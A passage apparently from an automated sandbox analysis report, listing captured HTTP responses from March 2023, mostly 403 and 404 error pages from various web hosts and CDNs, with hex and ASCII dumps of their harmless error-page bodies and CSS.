76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 55c444a7-2476-4307-a35c-206d525c98deCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B91NArffGc3%2FCcPSUtsPuiHg9BZM8rcabjFG3iIffeUpT0YbiSloL7SsF7sbReQ%2BKbbIxz3QnZd5OHWfUQlBpvL8WYEzyL23K6LRkrVvTKCQhqP8SQpIQ2bNi4N%2B1MI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=126.999855Server: cloudflareCF-RAY: 7abbc8d0ec663654-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:19 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2oRpanYhsYvFdMy2RjLHTE9YEBDnfIhcrnbZNqkHVYoiHjxMXwX4L5yPMEukixF41V5cGkKQbzMoJ2rSvxsYCIM0AGKXh9P16xfhQSc4C6RAIqFgV%2BNHh8jvdnSvdnvy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8d2c8499076-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:19 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Og9mC7OdVkM7TcGIUdhfshCrhze2N7YnUVVw4N7CUfIwD9DYsUeQs6lE9HGkX%2Flj%2F%2BOi2Uyx1b93TAcXUgsMvJk1bU0%2Fa80hEKUR6ijubodCfmYFmIxYJaMoXMNqxSgb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8d318739076-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 8a76638c3fbe43324c39b7be1c85ca7c38c34260Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Date: Wed, 22 Mar 2023 04:45:19 GMTData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 31 37 30 22 2c 20 31 36 37 39 34 36 30 32 36 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1170", 1679460269, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:20 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: kR7kFS6Y/KBa5JNybData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:21 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:22 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: 3J4XSXmA/SHPcmBLqData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:22 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:23 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y2aSszezaRUhYQPmotl4YbcWAU8z2p%2FYcEUZAwdSRYEbQd9Z%2BLJS1Um6xCiT3RHndCbuO0XuvHMLBfDBIY0uZDPrQkoGIZkdRKWEYUvPURwDDokhwUOTuYSezEU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8ef0a9e2c37-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:25 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/F7ohSd5HIQqoFCM0zJgPyv,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1679460325.10815983354116284X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yo%2Bgd28lDcB7pp6YoiKlDsP2THG%2BEuhrzm9KInNh%2ByJtRHspmgPr%2B2u%2FXzPPY%2BYlX%2FYQiyJoesuiVUdvnj55v08pVxstcuYp7SuDnsYwHa%2BZIWhr5RibkTx8VWwtxb9N4Hc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8fb3ad79280-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:45:26 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 